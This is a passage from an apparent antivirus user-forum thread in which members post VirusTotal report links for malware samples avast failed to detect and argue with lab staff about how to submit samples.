It means that if you had a significant number of samples, there could be an arrangment that you would upload them somewhere daily, in a very specific format (exact name of the archive, possibly specific file structure inside of that archvie) - and they would get somehow included into the automated processing as an additional feed.
But uploading single, randomly named files on the FTP is pointless.
-
a predefined name means a specific name known to you and viruslab to easily identify the file on our side.. this way is applicable for larger batches of samples, single files should be sent rather via e-mail...
-
a predefined name means a specific name known to you and viruslab to easily identify the file on our side.. this way is applicable for larger batches of samples, single files should be sent rather via e-mail...
It is to rename the sample and send it via ftp?
We could send the samples we had a day one by one via ftp ?
Could give a practical example ?
Please explain with simple words because my English is bad.
-
Please use the usual e-mail - it will really be easier, and the samples will be processed in exactly the same way.
-
Please use the usual e-mail - it will really be easier, and the samples will be processed in exactly the same way.
I also think.
But the problem is there are samples that will take days to be detected and others never are.
-
But the problem is there are samples that will take days to be detected and others never are.
Yes, I see this problem, too...
-
fresh and new project
http://www.virustotal.com/file-scan/report.html?id=b10b74a90503075d471534179ba9b023ade703624b9f358335c89fcb418e5059-1287231801
-
http://www.securelist.com/en/weblog?weblogid=208188011
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
http://blog.eset.com/2010/02/02/kaspersky-virus-total-and-unacceptable-shortcuts
Thanks. Need to read everything, but seems that no names are disclosed, just the fact itself.
-
Edit/removed.....wrong answer .... :-[
-
Pondus, I was referring to the name of the sheeper companies that follow Kaspersky placebo... ::)
-
http://www.virustotal.com/file-scan/report.html?id=e7f1a013004463f9f3c2c4c84cb6b9eb51418622c3c760d4557a99396f06a84d-1287233084
as you can see it seems that it's not detected by avast at vt BUT at my pc avast detected it as win32:malwaregen.weird
-
virustotal may be slower with VPS updates... btw: some rogue samples should be detected now (either as Trojan-gen, Malware-gen or SuspBehav - our heuristics have been improved during this weekend and further improvements will follow as usual).. if you don't have the files to make a resubmit/rescan you can at least see the irrelevance of posting "empty" links, which you have no clue what they stand for :P
-
http://virscan.org/report/95d9541c232ebcb6b1ada20a28a0e3d3.html
http://www.virustotal.com/file-scan/report.html?id=0ed7204efd2782c04668302f973d541c3cee794649661ec3e1a3bd2278b1fa35-1287521982
-
Zbot
http://www.virustotal.com/file-scan/report.html?id=a549a0386ec2e8c0a8c6416adbce9dc60f9f91b7cf43ed4a1302b1e0dcd8210b-1287582043
-
http://www.virustotal.com/file-scan/report.html?id=54eb820a86d4afd02cb627726a7ff325d8d02ac64ac9a7861577ab074968f77f-1287682833
http://www.virustotal.com/file-scan/report.html?id=c7a90fc33e6774b0ae6be6d52e08f98ad32f8626689b2272f80592b2e72da4d6-1287682836
http://www.virustotal.com/file-scan/report.html?id=a288da956e6131a994fb9bd95e99736eef124a1c0c400e0d02601c0dffd757d8-1287681669
Sent to Avast Lab.
-
Sent to Avast Lab.
Thanks for helping improving detection.
-
http://www.virustotal.com/file-scan/report.html?id=e7f1a013004463f9f3c2c4c84cb6b9eb51418622c3c760d4557a99396f06a84d-1287233084
as you can see it seems that it's not detected by avast at vt BUT at my pc avast detected it as win32:malwaregen.weird
its now found by avast,BitDefender,and my anti virus g data whist i don't have yet.
-
http://www.virustotal.com/file-scan/report.html?id=e7c3807967df6e1bdf0c05b1a0fe28f575e95c6c3407e02cf1363013141a7c69-1287111602
I think this is 1 Year old or 2 year old
-
Security Tool
http://www.virustotal.com/file-scan/report.html?id=b7b1468525d0deb08a04424ebe6fa4dea8fc794994a6b1fc5ac34c3e1dfe4804-1287853988
http://www.virustotal.com/file-scan/report.html?id=5902d245f1b307dd5d10efe41c93310cf0d629d3d732172d84179c5bf3dc1fa9-1287853571
-
http://www.virustotal.com/file-scan/report.html?id=60ca507ef4ba7dbbb7ef6ea4b975b9b09a24d7d0c91d38d0876331203f962d98-1287861724
only Avast 5 find it not 4.8
its have trojan spambot.c and
other trojan.
-
chabbo, did you send the sample to avast?
-
chabbo, did you send the sample to avast?
If not, i have ;)
-
v4 does not detect PUPs at all, that's it..
-
ardamax installer
http://www.virustotal.com/file-scan/report.html?id=88370b9ff5652ce367526fe51deb0fcc50e2a92acc33ef5ad61e36063ad90fff-1287947082
actually it's a keylogger creater so it's (not) a malware ?:S
analyze and tell as fast as you can :)
-
fake av: http://www.virustotal.com/file-scan/report.html?id=00f32c25b3f48af91cf2df34c212c55c1ef83f8fef240829ec753e4cdf57ced0-1287948827
trojan: http://www.virustotal.com/file-scan/report.html?id=8a1ca21f565aec540aa0e3bb4fca52fd32792183aeea3aae08a4f582710111e6-1287936518
both were sent to avast!
-
Slapper Trojan found by Avast 5 but not 4.8 ???
http://www.virustotal.com/file-scan/report.html?id=17ec80f41f6d5017046cc89278147efd6673c45346367c6b3307dede4ea3a80a-1288124367
-
thx 4 remind :)
-
new malware http://virusscan.jotti.org/en/scanresult/c36f848df0039d1525bfef47154c03a8874eb3ef
sample :
Please,remove the link to malware. Send the sample as a password-protected zip-archive to virus<at>avast.com.
-
I have 4 samples that are not detected by avast has seven days
>:(
-
bachnguyen09, you can leave the link from jotti :)
-
Worm.Autorun
http://www.virustotal.com/file-scan/report.html?id=e3ae9d1d016589935718092f7df8df3f106dc7aa301340c4b19457c500ba98af-1288472531
-
http://www.virustotal.com/file-scan/report.html?id=a9ab8b6b0b74a9b0075caeeb544136aea9388db2e67f4c64246b590fad7a0a51-1288522576
http://www.virustotal.com/file-scan/report.html?id=8eab24201eeb1396aa717d0bd79d377b8f4c5ef5287b8f62cff2184ae8bd821a-1288522349
http://www.virustotal.com/file-scan/report.html?id=b546ce0a12dfafce59b2b2868248f5b5578235a6e4af52a8dd21fc9757561f33-1288523434
Sent to Avast Lab.
-
Here an user in the Spanish forum with an undetected sample.
http://forum.avast.com/index.php?topic=65848.msg555827#msg555827
-
here are some threats that avast did not find
http://www.virustotal.com/file-scan/report.html?id=b1fc3e6a913fa3c30be290f14affb9b2e55195a03a297f9ee519dc46796ccb79-1289284240
http://www.virustotal.com/file-scan/report.html?id=aa3419dadd52d3ee7b46c36dfed7542932ff4a813e16ee60474a17c6b3dc4bc8-1289282129
-
Your 1st is only detected by 2 scanners, one suspicious and the other a variant of, both of which are of a higher potential for FP.
Your 2nd one is missed by every one of 43 scanners and seems like some copycat comments at the bottom of the page.
However, all this is a moot point as links to VT alone are pointless as members of the avast virus labs have said on a number of occasions, they need the samples. So it is more important to submit samples to avast.
-
my bad
-
http://www.virustotal.com/file-scan/report.html?id=67ad1c93c546880ba311aad2e5c19eb33a2eeaa2f2b2906836f63b7715500bba-1289363902
http://www.virustotal.com/file-scan/report.html?id=3e82282ac240eb6a47dfa84d59ff942ce7c2369b5293d76e9fe86aabd264d80f-1289363896
http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289363574
http://www.virustotal.com/file-scan/report.html?id=6fe4f8e00d1d0ca5253fb0ab28a6bc3080b782ecc58b5dea21a1388f08b1723d-1289363907
http://www.virustotal.com/file-scan/report.html?id=67ad1c93c546880ba311aad2e5c19eb33a2eeaa2f2b2906836f63b7715500bba-1289363902
-
http://www.virustotal.com/file-scan/report.html?id=ce48d778550aaa27aec92531870abd30995e5475ad23b4c50e9685c2551bbd8b-1279900191
http://www.virustotal.com/file-scan/report.html?id=f41b88506655174076e2bd781f8285b360ed9d3267b2e81446f9daaebdf53c8f-1289442972
http://www.virustotal.com/file-scan/report.html?id=2bc9d22343dc407b627ff29801a604fc02d0b9c55647eed04e30d8d67bcb0948-1289443049
http://www.virustotal.com/file-scan/report.html?id=d8742493cee66ed81255dedc0aa99fa6c1e9125c123066e691ae4daea699cdb8-1289106634
-
http://www.virustotal.com/file-scan/report.html?id=4e9a3ad34db9ca541f08faee4bdd73cd2715ae8c88dcbca8f157e2243b5a1074-1289457086
http://www.virustotal.com/file-scan/report.html?id=68aa60a46a2d546b48cc98cb2c898c8765011c9f8e0e12353f724652869d6c37-1289456975
http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289457804
http://www.virustotal.com/file-scan/report.html?id=3f112fdc6ef8190b0bcc6798cc8f1decbfa54d7310ff9308f2cb60db041fb29e-1289458254
http://www.virustotal.com/file-scan/report.html?id=ab8147e4a3605e0051be24bc260425a32c7b6a529024e8f1419ff3b38a8ce4f3-1289458476
-
Are you submitting the samples to avast?
If not, you're losing your time posting the links...
-
@Tech you can continue to submit VT links here.lol
http://forums.comodo.com/av-false-positivenegative-detection-reporting/malware-not-detected-2010-t49281.0.html
-
Are you submitting the samples to avast?
If not, you're losing your time posting the links...
yes we are want to submit the samples to avast
-
Hi :)
Possible undetected malwares: http://www.virustotal.com/file-scan/report.html?id=34da592c1e1339be43657cb072f767874a8dae598a97a591b88ec3b12ad1c12e-1289509350
http://www.virustotal.com/file-scan/report.html?id=1a096a4bfe803b54268d00f4bbbe88c8d3891a3f17781d164a35b938c1170f50-1289510065 (Avast detected this virus but Avast4 didn,t detect it)
-
@Tech you can continue to submit VT links here.lol
http://forums.comodo.com/av-false-positivenegative-detection-reporting/malware-not-detected-2010-t49281.0.html
And what is the relationship between avast and Comodo in this case?
-
@Tech you can continue to submit VT links here.lol
http://forums.comodo.com/av-false-positivenegative-detection-reporting/malware-not-detected-2010-t49281.0.html
And what is the relationship between avast and Comodo in this case?
Actually when you submit a malicious file to VT, VT will submit the undetected malware to both Avast and Comodo, so I do not understand why such a thread exist on both the Avast and Comodo forum.
Anyway I will not hijack this thread with a Comodo discussion.
Keep up with your submission guys.
Regards
-
Actually when you submit a malicious file to VT, VT will submit the undetected malware to both Avast and Comodo, so I do not understand why such a thread exist on both the Avast and Comodo forum.
exactly, and some of the avast! Guy`s have explained that a couple of time, but this tread refuses to die
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=5fb3a5adaef0738d03433f988bb743f6dbfb97cf46bfad1d34cae4af15895d53-1289547163
Update: Now detected as Win32:Malware-gen
-
When you're facing a sample that avast is not detecting... and you check with virustotal and yet avast does not detect... Or when you get infected because avast simple failed... well, you think you could have a place to say: Hey, avast detection rate could be better.
-
But it still achieves 'nothing' and as I keep saying if you don't go back and modify your posts when it is added, then it is a totally one sided, unbalanced topic that helps 'no one' other than to allow someone to vent their spleen.
It is a total waste of time, avast will always be trying to improve detections. It is the nature of the beast that AVs will always be playing catchup. This is why the generic, algorithmic, behavioural and heuristic signatures/rules were introduced to help improve over just signature based detection.
-
I agree with David, this topic is useless.
Unless avast open a topic like MBAM has for posting malwares, this kind of topic is useless.
Just something else is about submitted malwares end, we never know what happened to malwares we have submitted, Delivered or not? Some of them are being added to database but what about those that are not detected? Are they clean or they are just being ignored?
avast! need more way for collecting malwares, a web-interface is essential, something that does not cost much for avast because they already have resource for that (A public FTP Folder with enough hosting, bandwidth etc) and just need time and a technical team work on that a few days. I don't want post link to other vendors website because some people don't like, if not, I could post some example ;)
-
It is a total waste of time
Don't lose yours then :)
-
This kind of topic is useless.
Sorry Omid, but does this make your suggestion also useless? I don't think so...
avast! need more way for collecting malwares, a web-interface is essential, something that does not cost much for avast because they already have resource for that (A public FTP Folder with enough hosting, bandwidth etc) and just need time and a technical team work on that a few days. I don't want post link to other vendors website because some people don't like, if not, I could post some example ;)
-
It is a total waste of time
Don't lose yours then :)
No it is a total waste of time posting the VT results as I have stated quite clearly and not as you have taken an extract of my comments and posted it in isolation.
It is a total waste of time, avast will always be trying to improve detections. It is the nature of the beast that AVs will always be playing catchup. This is why the generic, algorithmic, behavioural and heuristic signatures/rules were introduced to help improve over just signature based detection.
I'm not the one wasting time posting VT results.
-
I'm not the one wasting time posting VT results.
Just let the thread there. Don't post. Don't read. Don't waste your time. But don't say a thread that I have opened with the best intention and with 180+ posts is a waste of time. It's a matter of personal respect to the one who opened the thread.
-
The number of posts or who started it or respect for who started it has nothing to do with how useful or useless or a waste of time a topic is. That is down to clear hard facts, simply posting the VT results isn't going to help detections, samples are.
Why if it isn't a waste of time have several of the virus labs team said it doesn't help them. So to that end it has to be a waste of time and as I keep banging one if you don't bother to update your posts when a missed sample is added then it is totally unbalanced. So those visiting the forum get a totally unbalanced view about avast missing samples when there are no subsequent updates when they are added.
So sorry, if I decline your autonomous command not to read, post or waste my time. That is my right to waste my time as it is yours ;D
No one has said anything about your best intentions, that isn't in doubt, just the fact that it isn't meeting your intention.
As my first thread get hijacked and closed without even warning me :P, I'm starting a new one trying to help avast improving detection if possible.
<snip>
-
Are you submitting the samples to avast?
If not, you're losing your time posting the links...
Sure Tech, Everything I post here is sent to Avast (Along with as many others that aren't detecting them as possible)
-
Rogue A/V Program.
http://www.virustotal.com/file-scan/report.html?id=28ae36996382d05cf5ab0bd5c6763ccef9f4ee50eb62feeb3b4b453eb304218f-1289621871
Now being detected as Win32:Malware-gen
-
trojans
http://www.virustotal.com/file-scan/report.html?id=df80dcf3f0d3ee24a508423e48e8d0bb96e44bb5945957b39953d9ab33c97477-1289674128
http://www.virustotal.com/file-scan/report.html?id=38f243ad6fe99e3dfc0f0c9a17bb069b16024ce3afa1e1e88d6246f17b83fc34-1289691606
http://www.virustotal.com/file-scan/report.html?id=798daa4884f51105d09442e585dffa82a35d8e772ef54884aa9f1270ca59991b-1289693895
http://www.virustotal.com/file-scan/report.html?id=d71c12a31f4c01f4502e4a552a9ba9150633db00653753a9e073bef1c1d7cc38-1289673984
http://www.virustotal.com/file-scan/report.html?id=798daa4884f51105d09442e585dffa82a35d8e772ef54884aa9f1270ca59991b-1289693895
http://www.virustotal.com/file-scan/report.html?id=38f243ad6fe99e3dfc0f0c9a17bb069b16024ce3afa1e1e88d6246f17b83fc34-1289697638
http://www.virustotal.com/file-scan/report.html?id=55a39c0b8a8ca16da175bcb3643845296596668504d9a93c1ad322cf68bbb1f5-1282137832
http://www.virustotal.com/file-scan/report.html?id=7430213bca3d3e0abd5e41fbb2b4c09981b14dbcb266fdccfb7706f92a0b1003-1289697253
bot
http://www.virustotal.com/file-scan/report.html?id=b7689c6c10d9887a0fdff2379fae8acc73403e3a68a4236bbb5112d41994d3d7-1289650783
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=bd3edd73b282c48a040ed0673fdae723b26c518358fa94fc26f7814f79dd5086-1289705161
-
Is possible that a trojan can be disguised as a Screen Saver file extension?
http://www.virustotal.com/file-scan/report.html?id=a0aa12cdd31154dec56880f57577c316d154945f74dc4e0cceeaba36e5b7cb4d-1289748843
The file was submmited to avast!
-
Zeus v2 sample
http://www.virustotal.com/file-scan/report.html?id=eb6cd7f47545e9c7e1811b49c1e9f07c012a987147cd82210b0192d05d371419-1289748173
Submitted to avast!
-
http://www.virustotal.com/file-scan/report.html?id=91016ccb7ebc08d77fecea5b305f84eeb0d67d2dc22a2391c3d4fb0ba4a4731d-1289938070
http://www.virustotal.com/file-scan/report.html?id=c0d931378b3746894dfc3efc3900dccb112f065e077c2a5e18c236d6dda345b8-1289937663
http://www.virustotal.com/file-scan/report.html?id=fa99a37e7e76a0853a1f9c0c9ab91eb638c1aaf0641f450d8e00d0bd5b7911b1-1289938624
-
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1290143899
http://www.virustotal.com/file-scan/report.html?id=78373ec7d52d511d6ff3334c9d24f50db16a1a5f7038de00add5f436754fdb8f-1290137657
http://www.virustotal.com/file-scan/report.html?id=27b20bf0d034211adfa1ec9b27e2184ff939c89a0047c903315da5e70f9bcd11-1290114380
http://www.virustotal.com/file-scan/report.html?id=1fec86b0ca32c32b47b6a147d4a88ede46aadd4771a17def67178fedc344e1e0-1290122349
http://www.virustotal.com/file-scan/report.html?id=7e48b9e7f34b42a1cfc4ba6c4f0d51fd8ff11eacb4353563995de1f56c091cd7-1290142292
http://www.virustotal.com/file-scan/report.html?id=7666bdb4ffa6344e8167633852966560501b5cdee7cd254f732a5f956cc30868-1290140660
http://www.virustotal.com/file-scan/report.html?id=f7a82722948184ced6a580bf8df3966201832b9b0a07bdf2e05fec314f3a9172-1290142349
http://www.virustotal.com/file-scan/report.html?id=75e3e48ba79564386b215681f279072f817f421655e9bb76b093d876831cf376-1290142320
http://www.virustotal.com/file-scan/report.html?id=0e1882c26fffb718ebe61379e612597a750562248f4371d963e217abfcde91c6-1290123692
-
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1290235107
http://www.virustotal.com/file-scan/report.html?id=618c8fe42aa8d4ab93e45fbe15556676c8955e532f1327059d3b9b51cb0191b6-1290210980
http://www.virustotal.com/file-scan/report.html?id=48c3e39c6a9f265e50ae4c2f5977e58d0fa71abaaa463b4cb7f31905f3c7d123-1290227360
http://www.virustotal.com/file-scan/report.html?id=9b42b3ff4e302328ff1593c9867941587b110a2e511528adc980807055f6d764-1290237285
-
Fake AV program
http://www.virustotal.com/file-scan/report.html?id=935231acde473f769a003ccafec31823aa333122623ff0965bb473e0d18ed5d4-1290283102
-
http://www.virustotal.com/file-scan/report.html?id=283dd498f973656fd6840a666b0857cf4376ff4e8bdeb0bf69107216555a5a9e-1290274802
http://www.virustotal.com/file-scan/report.html?id=25d13f2dfc380191d488f5218cb16187f9ba0f30136b34c58806223db198d866-1290281390
http://www.virustotal.com/file-scan/report.html?id=9233ec6abbe7c2e885fdd5e6126e8c13d83c3d09710525b225073d8f748d0455-1290281147
http://www.virustotal.com/file-scan/report.html?id=b10d97488bea300be1dfbc5ecd8b349a0daa5a3730daa5a139c2fabfd30cd682-1290287246
http://www.virustotal.com/file-scan/report.html?id=1915f81042991096778b05d89903ac97b8edea768d8bf680db5d93dd3702017b-1290270167
http://www.virustotal.com/file-scan/report.html?id=8e051f3c1a40a2b6bf312a73fee364f8bd13e67b60df518c51eb70ac8e4cfa58-1290286601
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=982590d692dad38821beeac8a67bca0d48588411da840f1e7cdc52551131d90e-1290405306
-
Another Trojan.
http://www.virustotal.com/file-scan/report.html?id=7405481483e0db3a217206d44ab7bed0a67cd612022b48c3e0609e1953f36874-1290486211
-
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=08be62efec518609ffdc23be0a6487a23c7ff2905ce4cce878e039235c1b7fba-1290919831
-
Malwares and PUPs not detected by avast (but from ESET on line):
Nero Burning Rom installers as Win32/Toolbar.AskSBar application
Format Factory 2.10 as a variant of Win32/Adware.ADON application (file >20Mb).
Keygen (http://www.virustotal.com/file-scan/report.html?id=2988cd576f121a7ec4a6465c0b7c34e54693534fe17fc420c8f82e04d19eba21-1290964254) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=351b67dc73b4b42b90160ed2363d99dc40b39ea07be1788c034767a088ced236-1290964252) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=5dc9c2613e0fcbe975aa8eb644b8c331a29b94221313f175db1e5c29b4065f64-1290964594) submitted from Chest.
Asterisk Password Reveal (PUP?) (http://www.virustotal.com/file-scan/report.html?id=84e280f5ec0c7c5a79b2f885d4a3672dde199a27a22dd6c01e62657fcced2f4c-1290964888) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=20f1df38534b05fb80b6ebbe43ec909aa8b5e4980a0bcdf7a117737d307e4fa5-1290965268) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=913d463352eee7bd9f8c4d2e341aeaf1396d22f2e6b90d47c3b8f110c0efdeb7-1290965252) submitted from Chest.
KillProcess 2.44 (PUP? a variant of Win32/KillProcess.A application?) (http://www.virustotal.com/file-scan/report.html?id=014d58b0ba45495ba72c07f68afb8d74cd7d818e5c740f3b3be97d908166988e-1290965661) submitted from Chest.
Is Unlocker 1.9.0 setup a Win32/Adware.ADON application? (http://www.virustotal.com/file-scan/report.html?id=1ad20b852885783d90567d61089f369c9fdcaaa52116a0377663bac4b1c30572-1290965148).
In my tests, only one false positive of NOD32 (ESET): http://www.virustotal.com/file-scan/report.html?id=d5c67fea9f9d0de88f10a4acb728e6d4f1807f43ecc348cb2523e332bfae61b7-1290965863
At least after 1 hour of work, can I have an answer from the virus analysts to this particular post?
-
Malwares and PUPs not detected by avast (but from ESET on line):
Nero Burning Rom installers as Win32/Toolbar.AskSBar application
Format Factory 2.10 as a variant of Win32/Adware.ADON application (file >20Mb).
Keygen (http://www.virustotal.com/file-scan/report.html?id=2988cd576f121a7ec4a6465c0b7c34e54693534fe17fc420c8f82e04d19eba21-1290964254) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=351b67dc73b4b42b90160ed2363d99dc40b39ea07be1788c034767a088ced236-1290964252) submitted from Chest.
Keygen (http://www.virustotal.com/file-scan/report.html?id=5dc9c2613e0fcbe975aa8eb644b8c331a29b94221313f175db1e5c29b4065f64-1290964594) submitted from Chest.
Asterisk Password Reveal (PUP?) (http://www.virustotal.com/file-scan/report.html?id=84e280f5ec0c7c5a79b2f885d4a3672dde199a27a22dd6c01e62657fcced2f4c-1290964888) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=20f1df38534b05fb80b6ebbe43ec909aa8b5e4980a0bcdf7a117737d307e4fa5-1290965268) submitted from Chest.
Patch missed by avast (http://www.virustotal.com/file-scan/report.html?id=913d463352eee7bd9f8c4d2e341aeaf1396d22f2e6b90d47c3b8f110c0efdeb7-1290965252) submitted from Chest.
KillProcess 2.44 (PUP? a variant of Win32/KillProcess.A application?) (http://www.virustotal.com/file-scan/report.html?id=014d58b0ba45495ba72c07f68afb8d74cd7d818e5c740f3b3be97d908166988e-1290965661) submitted from Chest.
Is Unlocker 1.9.0 setup a Win32/Adware.ADON application? (http://www.virustotal.com/file-scan/report.html?id=1ad20b852885783d90567d61089f369c9fdcaaa52116a0377663bac4b1c30572-1290965148).
In my tests, only one false positive of NOD32 (ESET): http://www.virustotal.com/file-scan/report.html?id=d5c67fea9f9d0de88f10a4acb728e6d4f1807f43ecc348cb2523e332bfae61b7-1290965863
At least after 1 hour of work, can I have an answer from the virus analysts to this particular post?
Hello,
we will not add detection for keygens.
Milos
-
Hello,
we will not add detection for keygens.
Milos
Are these all keygens...:o
Tech, what's up...???
asyn
-
We will not add detection for keygens.
I suppose that for "keygens" only and not for infected ones (clearly malware). Right?
And second, what about the PUPs? And Unlocker?
-
Keygen ??? ??? ???
But Keygen is a Source of Hacking Software ??? ??? ???
-
But Keygen is a Source of Hacking Software ??? ??? ???
But avast should protect only against infections and malware.
It's not intended to protect intellectual property of 3rd party softwares.
So, if it is an inoffensive keygen (i.e., only generates keys), it won't be detected.
-
But Keygen is a Source of Hacking Software ??? ??? ???
But avast should protect only against infections and malware.
It's not intended to protect intellectual property of 3rd party softwares.
So, if it is an inoffensive keygen (i.e., only generates keys), it won't be detected.
okay i got your point tech. if the third party software is hack, then avast is not responsible to clean up the mess
Regards!!!
-
We will not add detection for keygens.
I suppose that for "keygens" only and not for infected ones (clearly malware). Right?
And second, what about the PUPs? And Unlocker?
Yes,
of course ;-), you are right.
Milos
-
Hello,
we will not add detection for keygens.
Milos
way to prevent FPs, glad to hear that!
-
Can i add 1 here? or maybe i am late. is this posted already??
http://www.virustotal.com/file-scan/report.html?id=47b472d6d7183911ccfe1bed790ca6485c051b79d04dc0a7775cee48629af735-1291131404
-
http://www.virustotal.com/file-scan/report.html?id=a41a7d89e54b822697a32dccf144dc19a7d1e9ed38fe33e9b6c1947fddcf4fc1-1291131900
http://www.virustotal.com/file-scan/report.html?id=fd78a957851054d3f71a292e580bfad89242c4952a68becb434b0c7fe789a379-1291131904
http://www.virustotal.com/file-scan/report.html?id=afb07e2bff42438c007aecbb87f54e9ab6c92b36ef46ae0c148fe308aeda9340-1291131931
sent to Avast
-
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291153301
http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455
http://www.virustotal.com/file-scan/report.html?id=a940a97a7d0c1d4e24c1148fdb838764f52f11cbadede7390ae22e59b7642abd-1291163390
http://www.virustotal.com/file-scan/report.html?id=67933b5bbf9b1e6227a412bcbc72c0486ec0a7b821c247061c1f3f90d27e4cd3-1291160460
http://www.virustotal.com/file-scan/report.html?id=0f19cb2288164f8ba18f6d8ce02b4a2fcb2cad926f925df4aec8987d92179331-1291163552
http://www.virustotal.com/file-scan/report.html?id=4dbd709c51a4d8cf2e7c85c0dfba09e3516a3f9eeb1677ec40536be0d98fb7de-1291161048
http://www.virustotal.com/file-scan/report.html?id=a1ed506b1587d39815e0b0e89ffcd6313098ad0d0be2dbf660cc1d3771923819-1291161898
http://www.virustotal.com/file-scan/report.html?id=36720ea39a4620003952ef60ab03b155a3a5e7c5017c38c13db05c9cc01a7a3d-1291162777
-
nsm0220,
1. Why do you think this is infected?
http://www.virustotal.com/file-scan/report.html?id=a1ed506b1587d39815e0b0e89ffcd6313098ad0d0be2dbf660cc1d3771923819-1291161898
http://www.virustotal.com/file-scan/report.html?id=67933b5bbf9b1e6227a412bcbc72c0486ec0a7b821c247061c1f3f90d27e4cd3-1291160460
2. avast won't detect inoffensive keygen. I'm not sure this is one... Anyway, CIS is free and don't need a keygen.
http://www.virustotal.com/file-scan/report.html?id=4dbd709c51a4d8cf2e7c85c0dfba09e3516a3f9eeb1677ec40536be0d98fb7de-1291161048
3. invoice.scr seems really infected. Hope avast improve detection.
http://www.virustotal.com/file-scan/report.html?id=0f19cb2288164f8ba18f6d8ce02b4a2fcb2cad926f925df4aec8987d92179331-1291182068
4. This also seems infected: http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455
5. This IS infected for sure... Please, improve detection avast...
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291183205
-
the 4th one i need that for gdata database
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=b12474f41a651c037e04ccf3c2983136079147ea3ffcfefd278846f430249128-1291277536
-
Another Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=72cfd245f0a985ee259d40bc1636b802f25d9825565da602e4c9b28446bc81d5-1291350316
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=03a4369f802f8e348f22d2c691cf1044172637ff979844d1e0a20844578ae07c-1291352451
-
Trojan.Zbot
http://www.virustotal.com/file-scan/report.html?id=5cc6c20cc70948caf5c35cbf1a0821cbeea95ff0ab1aa757f304e1a5ef31d626-1291355314
-
Another Trojan.
http://www.virustotal.com/file-scan/report.html?id=fe4c2063a87ad4c832412f5a54cd552ed6abf48ab1f3bd739822ce092621708e-1291438301
-
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=77dce6096de5e36fefa70e79a4fa34161649981986952ce08e19a6dc656b8fbd-1291617982
-
nsm0220
4. This also seems infected: http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455
why is the 4th one is not in the database,it a threat
-
http://www.virustotal.com/file-scan/report.html?id=e840d30d844bcc3e4b85fb401c1c861b3802b8c6a4f9a97884a3544e6dd7aa78-1291631580
http://www.virustotal.com/file-scan/report.html?id=5f0d0797d16af6c55dee86089754aef182050773ffb5edf0384ee6f1e855b8e4-1291647651
http://www.virustotal.com/file-scan/report.html?id=9e68e7e65330a40472a538e770f2f04faf060caa247e721d25e2041f908fa6d4-1291648478
http://www.virustotal.com/file-scan/report.html?id=feab158a71c75f8a94c3fd7b3920efcc79fb9fceb36f32f363b217bcbebf46c4-1291635911
http://www.virustotal.com/file-scan/report.html?id=f303380429d998863eae9a7aa5f56281aef1b3a3ffb5b7a921ff69c30b587ca5-1290031274
http://www.virustotal.com/file-scan/report.html?id=3b1228297147a679d98d3cc01e0c5deec73cc91707c712f3606183c92ca2a59f-1291648184
http://www.virustotal.com/file-scan/report.html?id=ef825efc34e69d811ce82d9c0b14b58d778dfcf9c7a71090b3d3eed4e70c8e20-1291660222
http://www.virustotal.com/file-scan/report.html?id=22dac5fcfe76ec96cbae4833bb59240926f7e3d83ad98369b658acab57dc5c3c-1290175769
http://www.virustotal.com/file-scan/report.html?id=17e072cca9723a69a7322ee3468226a31eb7ed5a85a6e26ac4ac1cd9659e05d2-1291671429
-
Trojan Banker.
http://www.virustotal.com/file-scan/report.html?id=9e68e7e65330a40472a538e770f2f04faf060caa247e721d25e2041f908fa6d4-1291701406
-
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=75d06934187a954dedda2012e20ec7ea8b8ca8569f3e28b50a9ebd5c2a02f1bd-1291703965
-
http://www.virustotal.com/file-scan/report.html?id=fbe964be1c247deb1ffaae2fc5ceb8f374cd56c5cfe313dd4fd11ca5cdbe9c10-1291687179
http://www.virustotal.com/file-scan/report.html?id=2e9f4f830f6e191475c8c65ee493fd4445f0778d50f21a639000951b915543b9-1291761341
http://www.virustotal.com/file-scan/report.html?id=a502d9397723208b68ec85a026c908a845de8af8b9a59b2fa06d07ef1e73e8e5-1291764175
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291830602
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1291848520
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1291848520
http://www.virustotal.com/file-scan/report.html?id=8863916514f8a6ce1fa856c6c7b8dbfb0c4b1b272aa8faaf404f1265d09b71a8-1291860624
